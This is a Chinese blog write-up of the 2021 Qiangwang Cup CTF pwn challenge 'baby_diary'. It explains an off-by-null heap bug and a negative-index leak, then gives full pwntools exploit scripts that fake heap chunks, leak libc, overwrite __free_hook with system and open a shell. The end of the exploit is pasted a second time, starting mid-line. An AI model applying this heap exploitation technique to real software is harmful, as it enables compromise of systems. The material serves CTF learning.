2021强网杯 pwn baby_diary

最新推荐文章于 2024-03-08 19:28:35 发布
最新推荐文章于 2024-03-08 19:28:35 发布
阅读量375 收藏 1
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/118162876
版权

保护

在这里插入图片描述

熟悉得菜单
在这里插入图片描述write
在这里插入图片描述在这里插入图片描述
这里有个稍稍复杂的机制。

在我们输入内容之后是一个’\x00’,紧接着后面会跟一个后面的数&0xf0再加后面函数的返回值。
后面函数是干嘛的。

在这里插入图片描述会控制后面哪一个字节。
具体来说是后面一个字节的高四位不变,第四位是所有字节加起来之后,将每个四位的数字加起来,如果大于0xf就再来一次,知道小于0xf。

所以我们就可以控制下一个chunk的size的低四位。但是我们不可能让它等于0.

read
在这里插入图片描述正常的输出。

在这里插入图片描述输出有判定条件,要求我们多出来的那个数字必须是1才可以输出,因为你看函数返回值&1之后要么为0,要么为1.v2不可能是0,所以v2必须是1,这就要求我们show的这个chunk没有溢出,没有其它的情况。

delete
在这里插入图片描述
看得到清理得还是很干净的。

我们的思路是这样的。
off by null 要么overlap,要么unlink。overlap的做法就是我们的house of einherjar
关于null我们可以两次释放申请一个fastbiin chunk,第一次修改最后一位为0,第二次再设置prev_size。
但是出问题了,报错。

在这里插入图片描述

看了一下源码,

在这里插入图片描述2.29之后通过这个检查把这种house of ein就没了。

所以我们只能考虑unlink。
unlink需要泄露地址,泄露一个heap地址,或者程序基地址。
没想出来。

参考了NU1L的wp,大佬还是大佬。
问题出在show,show越界了。

它没有限制我们show的index为负数。我们可以尝试一下,当我们show一个负数的时候,可以泄露哪里的地址。

我们试图从address_array向上寻找。
便于我们查找的区间是有限的,因为序号负数的时候用的是chunk的address,我们可以控制的address_array是有限的,所以我们不能找太离谱的。

gdb调试往上调,我们发现了一个这样的地方。
在这里插入图片描述
1008那里,它有bss上的一个地址,而且离下面的address_array距离并不远,show(-11)就可以做到。

我们想拿到这个地址,那么我们需要show(-11),并且绕过一系列的检查。
首先第一个问题就是,我们的size_array在-11的地方有没有一个合适的值。

我们发现在这里插入图片描述
size_array上面紧接着就是address_array,我们计算一下-11的size会在第23个chunk的高四个字节。

所以我们要首先申请够23个chunk。
申请chunk之后我们对应的show(-11)的size大小会在0x5555左右,我们就需要在那一块申请到地址,我们必须在那个地方留一个值,这样才能绕开show那里的检查,做到释放,所以申请的时候就申请大一点,然后里面的数据留‘\xff’或者其他的都可以。

剩下的爆破就行。

到此呢我们做到了一个什么事情,我们可以得到程序的pie。
贴一下爆破的部分算了,剩下的就自己随便写了。

from pwn import *

libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.31-0ubuntu9_amd64/libc.so.6")

def add(size, content):
        r.sendlineafter(">> ", "1")
        r.sendlineafter("size: ", str(size))
        r.sendafter("content: ", content)
        
def show(index):
        r.sendlineafter(">> ", "2")
        r.sendlineafter("index: ", str(index))
                             
def dele(index):
        r.sendlineafter(">> ", "3")
        r.sendlineafter("index: ", str(index))

while True:
        try:
                r = process('./baby_diary')
                for i in range(22):
                        add(0x1000,'\xff'*0x1000)
                add(0x7000000,'aaaa\n')
                show(-11)
                r.recvuntil('\x08')
                break
        except EOFError:
                r.close()
                continue
        
leak = u64(b'\x08' + r.recv(5) + b'\x00\x00') - 0x4008
gdb.attach(r)
input()

然后再去伪造chunk做一个unlink。但是别的师傅教会我另外一种方法。
它来自一篇博客。

2.29 off by null

它也是在伪造chunk,但是做法更复杂也更高级。
不需要泄露地址,伪造chunk的地址完全用large bin地址,用small bin地址,用了fastbin 地址。

我们这个题目根据题目特性,因为那个write函数的问题,做法跟他的有些出入。但是道理是一样的,大家可以去看看那个博客。

下面的图是我这里伪造好的chunk。
在这里插入图片描述伪造好也是随便利用了。

exp

from pwn import*

context.log_level = "debug"

r = process("./baby_diary")

libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.31-0ubuntu9_amd64/libc.so.6")

def add(size, content):
        r.sendlineafter(">> ", "1")
        r.sendlineafter("size: ", str(size))
        r.sendlineafter("content: ", content)
        
def show(index):
        r.sendlineafter(">> ", "2")
        r.sendlineafter("index: ", str(index))
                             
def delete(index):
        r.sendlineafter(">> ", "3")
        r.sendlineafter("index: ", str(index))


for i in range(7):
    add(0x38-1,'aaaa')  # 0-6

add(0x98-1,"aaaa") #7   这里的大小的确立是想把fakechunk放在最后一个字节为0的地方。

add(0xb40, "largebin") #8
add(0x10, "aaaa") #9

delete(8)

add(0x1000, '')   #8   ;chunk8 to largebin 
add(0x38-1, '' ) # 10

# make fd->bk = fakechunk
# 切割largebin
add(0x38-1,'aaaa') #11
add(0x80,'aaaa') #12   能把chunk13放在最后一个字节\x00的地方
add(0x38-1, 'a') #13
add(0x38-1, 'b') #14
add(0x38-1, 'c') #15
add(0x38-1, 'd') #16


for i in range(7):
    delete(i)

delete(15)  #
delete(13)  #0x600

# clear tcache
for i in range(7): # 0-6
    add(0x38-1, '')


add(0x420,'aaaa') #13   fastbin to small bin
add(0x38-1,p64(0x50))  #15  0x600

# fakechunk size
delete(10)
add(0x38-1,'\x00'*7+'\x03'+p64(0x201)) #修改fake_chunk fd

# make bk->fd = fakechunk
# clear chunk from tcache
add(0x38-1, 'clear')  #17
 
for i in range(7):  #0-6
    delete(i)
 
# free to fastbin
delete(11) 
delete(10) #fake_chunk  0x4f0   

 
for i in range(7): #0 - 6
    add(0x38-1, '')

# change fake chunk's bk->fd
add(0x38-1, '')

# fake pre_inuse /  prev_size
delete(16)
add(0x38-1,'\x00'*0x37) #11
delete(11)
add(0x38-1,'\x00'*0x2f+'\x20')

gdb.attach(r)

delete(13)

add(0x30, '')
add(0x20, '')
add(0x30, '')

show(12)

malloc_hook = (u64(r.recvuntil("\x7f")[-6:].ljust(8, "\x00")) & 0xfffffffffffff000) + (libc.sym['__malloc_hook'] & 0xfff)
libc_base = malloc_hook - libc.sym['__malloc_hook']
system_addr = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym['__free_hook']
print "libc_base = " + hex(libc_base)

delete(17)
delete(15)

add(0xa0,'\x00'*0x88+p64(0x41)+p64(free_hook))


# add(0x30,"cat flag\x00")
add(0x30,'/bin/sh\x00')  #17
add(0x30,p64(system_addr))  #19

delete(17)


r.interactive()
libc_base = " + hex(libc_base)

delete(17)
delete(15)

add(0xa0,'\x00'*0x88+p64(0x41)+p64(free_hook))


# add(0x30,"cat flag\x00")
add(0x30,'/bin/sh\x00')  #17
add(0x30,p64(system_addr))  #19

delete(17)


r.interactive()
yongbaoii
关注
专栏目录
强网杯2021 pwn部分wp
eeeeeight的博客
06-18 1318
baby_diary: 本题考查2.31的off by one, 漏洞处如下: 在sub_146e中会将输入数据的ASCII码相加再相加相加…直到变成一个byte的数字, 然后加到输入数据的后一位上, 因此我们可以尝试控制输入的内容, 从而控制下一个chunk的size大小 在确定完溢出点后, 我们便开始准备伪造chunk了, 由于要满足p->fd->bk == p, p->bk->fd == p以及prevsize == size, 我们需要申请一个largebin的chunk
2021强网杯 pwn babypwn
yongbaoii的博客
07-15 622
libc是2.27的。 保护全开。 还开了沙箱。 经典增删改查。 add 最多17个chunk,chunk的大小最大0x200.地址跟发小都放在了bss上面。 delete 清理的很干净。 edit edit也看着没啥,里面有个函数,进去看看。 会把所有的’\x11’变成’\x00’,但是问题就出在它没有边界,仅仅是到’\x00’就停而已。那么我们就可以有越界,来造成off by null。 show 输出都点不大正常。首先发现它是前后四个字节分开的。 然后看一下那个输出函数。 加密的,好家伙。 先.
2021强网杯 pwn pipeline
yongbaoii的博客
06-25 258
保护当然是全绿。 fastcall的调用方式让程序看起来有点奇怪,因为fastcall函数调用用寄存器调,反汇编不了,还是得读汇编。 一个一个来。 new chunk申请后写地址的方式还跟平常的不大一样。 允许申请10个chunk,然后用chunk复用的那个地方,也就是prev_size那个地方构成一个单链表,4058指向第一个chunk,然后每个chunk的复用位置存放下一个chunk的指针。 还会有检查。 里面反复提到4050,找到他。 4050处申请了一个0x10大小的chunk,里面存了一会.
强网杯2021 pwn 赛题解析——baby_diary
CoLin的pwn小屋
07-25 529
强网杯2021 pwn 赛题回顾
2021强网杯Writeup--by Nu1L Team.pdf
06-15
第五届“强网杯”全国网络安全挑战赛
强网杯2022 pwn 赛题解析.docx
12-18
强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWM.zip_PWM脉冲发生器_pwn proteus_单片机 pwn_脉冲 仿真_脉冲发生器PWM
09-24
PWM,即脉宽调制(Pulse Width Modulation),是一种广泛应用的数字控制技术,主要用于调节电子设备的功率或模拟信号。在单片机系统中,PWM脉冲发生器是核心部件,它通过改变脉冲宽度来调整输出信号的平均电压,从而...
强网杯2021部分web wp
qq_34097497的博客
06-15 951
强网杯2021
强网杯2021 [强网先锋]orw
半岛铁盒的博客
06-29 818
orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 因为不是FULL RELRO所以就考虑改got表为shellcode地址就行了 漏洞点就在于以上两点 令index下标为负数时可以覆盖到其他函数的got表地址 这里选择覆盖掉exit的got表中的地址,因为沙盒的存在,所以需要构造orw的shellcode并覆盖exit的got地址为shellcode 覆盖堆块的申请位置选择在这里 计算一下偏移量 起始点 0x
第七届强网杯-PWN-【warmup】
最新发布
llovewuzhengzi的博客
03-08 1169
如何布置参考使得第一个chunk布置相关rop,第二个chunk布置相关IO_FILE_plus_struct的伪造结构体,然后根据house of apple2来布置,并最后orw。
2021强网杯】Write-Up真题PWN和RE部分(强推)
kali_Ma的博客
06-16 1463
前言 不得不说强网的反作弊做的真心不错 re 不一样 真心可以 话不多说,请往下看: baby_diary 参考实现堆块复用,后面就是常规题目 EXP # encoding:utf-8 from pwn import * libc=ELF('./libc-2.31.so') def add(size,data='a'): p.recvuntil('>> ') p.sendline('1') p.recvuntil('ize: ') p.sendline(str(size)) p.
2019广东省强网杯PWN-1
SkYe's Blog
09-24 747
2019广东省强网杯PWN-1 题目分析 题目提供了:可执行文件、libc.so.6两个文件。下面开始分析,首先运行程序,如下图所示: 这是一道菜单题目,可以添加、删除、运行。是一道在堆上的题目。然后用IDA分析程序的流程。 首先看看主函数(main),对其中的部分函数做了重命名(在图中红框内函数),可以参照修改。 主函数 主函数循环执行,直到遇到exit()。首先是运行welcome_bro...
2021 强网杯 pwn notebook
yongbaoii的博客
04-18 635
kernal pwn 给了几个文件,然后来看看启动文件 #!/bin/sh stty intr ^] exec timeout 300 qemu-system-x86_64 -m 64M -kernel bzImage -initrd rootfs.cpio -append "loglevel=3 console=ttyS0 oops=panic panic=1 kaslr" -nographic -net user -net nic -device e1000 -smp cores=2,threads=2
hctf[pwn]babyprintf_ver2
九层台
11-15 824
0x01程序分析 程序给出了data段的地址,然后允许向这个地址处输入0x1ff个字节。 这个data段到底存的是什么呢? pwndbg> print $rbx + $rax $1 = 0x555555756011 pwndbg> x /50xg 0x555555756011 0x555555756011: 0x7200676664647364 0x200000000000646c ...
2018年强网杯初赛 逆向题目 hide writeup (超详细)
风如激的博客
03-28 3966
这道题有壳,strings搜索是upx3.91。但是不能用upx -d。只好手动脱壳了。难点在于本题目有反调试,有些函数不能步过。首先研究壳。第一句call必须步入。Sub_44f1c5必须步入。 Sub_44F1C5中,0x44f214的rep指令把0x400000到0x44f248复制到0x800000位置。0x44f22c处,rbp是0x84efb5。这句话是start处的第二条指令。这里不...
XCTF PWN高手进阶区之babystack
neuisf的博客
01-30 481
此题,开启了RELRO、NX、CANARY,未开启PIE,只有read函数溢出存在溢出可能。 第一,泄露canary,程序会通过puts函数输出缓冲区s的内容。puts函数在输出时,只有遇到\0才会结束,而缓冲区s又和main函数的canary相连,此时,输入和缓冲区大小相等的字符串,溢出的\n将会覆盖canary的第一字节00,从而将canary的后三个字节输出,构建canary。 第二,获取s...
(攻防世界)(pwnbabyfengshui
PLpa的博客
08-03 1309
入门级的堆题,拿来学习还是不错的。 做这道题之前,最好还是先对堆的数据结构有一定的了解。 拿到题目,下载附件,查看保护。 一个32位的程序,开了NX和Canary保护,这都不是重头戏毕竟这题不用栈,栈保护只是锦上添花罢了。 把文件拖进IDA查看逻辑: 可以看到,典型的菜单题,这很pwn,实现了增删改查四个功能,像极了C语言程序设计的期末结业程序设计题哈哈哈,暴露年龄。 进入增加用户功能: 可...
2022强网杯pwn赛题详解:基于largebinattack的houseofapple漏洞利用
强网杯2022年的Pwn赛题解析主要聚焦于一道难度较高的题目"house_of_cat",该题挑战者需利用glibc 2.35版本中的漏洞进行攻击,这是当时Ubuntu 22.04系统上最新版glibc。题目吸引了众多参赛队伍,但因涉及高级的_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值